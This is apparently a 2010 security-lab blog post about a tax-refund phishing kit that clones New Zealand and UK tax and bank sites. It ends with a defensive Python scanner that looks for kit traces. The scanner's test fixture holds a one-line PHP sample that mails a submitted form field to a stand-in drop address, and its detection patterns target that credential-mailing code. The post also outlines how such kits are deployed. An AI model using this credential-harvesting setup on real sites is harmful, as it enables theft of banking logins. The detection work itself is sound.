A month ago, the New Zealand Department of Inland Revenue (IRD) issued a warning advising people not to respond to scam emails claiming to offer tax refunds. We have observed these types of scams before, but the individual campaigns come and go. Like any other phishing scam, this email campaign is made to look like a legitimate notification from Inland Revenue, complete with the logo.
IRD Tax refund scam email
The link in the message body points to a phony web page that mimics the New Zealand IRD website. But the odd thing is the instruction in a red font stating “Please click on your following bank logo to continue the refund procedure”.
Phishing page linking to various New Zealand banks
Clicking on any of the bank logos opens a fake login page that requires the user to enter their banking credentials and other personal details.
Fake NZ bank login page
While digging around the phishing site, we came across a “readme.txt” file. It left hints that this phishing page was a kit authored by “MaxDeMon”, written specifically to target online banking users of a range of New Zealand banks.
Phishing kit "readme.txt" page
But after Google searching some keywords from the phishing kit, it looks like the kit is used a lot and comes in different variations. Here is a screenshot of a fake “Tax Refund Portal” mimicking the UK’s HM Revenue and Customs webpage, again instructing users to click on their bank logo:
Tax refund portal linking to a range of UK banks
The above suggests the ‘package’ is shared around, to be used by multiple groups. All they need is a PHP web server (preferably a hacked web server) and a PHP file configured to send phished banking information to their email address. That’s pretty easy, and probably why these types of phishing scams are persistent.
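As an added example (not code from the original post or from the kit), here is one way a site administrator could sweep a web root for the traces described above: a leftover readme.txt and a PHP file that mails submitted form fields to a hard-coded address. The indicator patterns, file names and sample contents are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Heuristic indicators (assumptions of this example, not taken from the kit).
INDICATORS = {
    "mail()": re.compile(r"\bmail\s*\(", re.I),
    "form-input": re.compile(r"\$_(?:POST|REQUEST|GET)\b"),
    "hard-coded-address": re.compile(r"""["'][\w.+-]+@[\w-]+(?:\.[\w-]+)+["']"""),
}

def score_php(text):
    """Return the names of the indicators found in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_webroot(root):
    """Report PHP files matching every indicator, plus stray readme.txt files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.lower() == "readme.txt":
                findings.append((rel, ["readme.txt"]))
            elif name.lower().endswith((".php", ".phtml")):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = score_php(fh.read())
                if len(hits) == len(INDICATORS):
                    findings.append((rel, hits))
    return sorted(findings)

# Constructed sample files; none of this content comes from the real kit.
SAMPLES = {
    "refund/post.php": '<?php $to = "drop@example.invalid"; mail($to, "r", $_POST["u"]); ?>',
    "refund/readme.txt": "constructed kit note",
    "contact.php": '<?php echo htmlspecialchars($_POST["name"]); ?>',
}

def demo():
    """Write the constructed samples to a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_webroot(root)

if __name__ == "__main__":
    print(demo())
```

A legitimate contact form can match all three indicators, so treat hits as leads for manual review rather than verdicts.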
– Rodel Mendrez on M86 Security Labs Blog
Posted on 24 November 2010. Tags: Persistent, Refund, Scam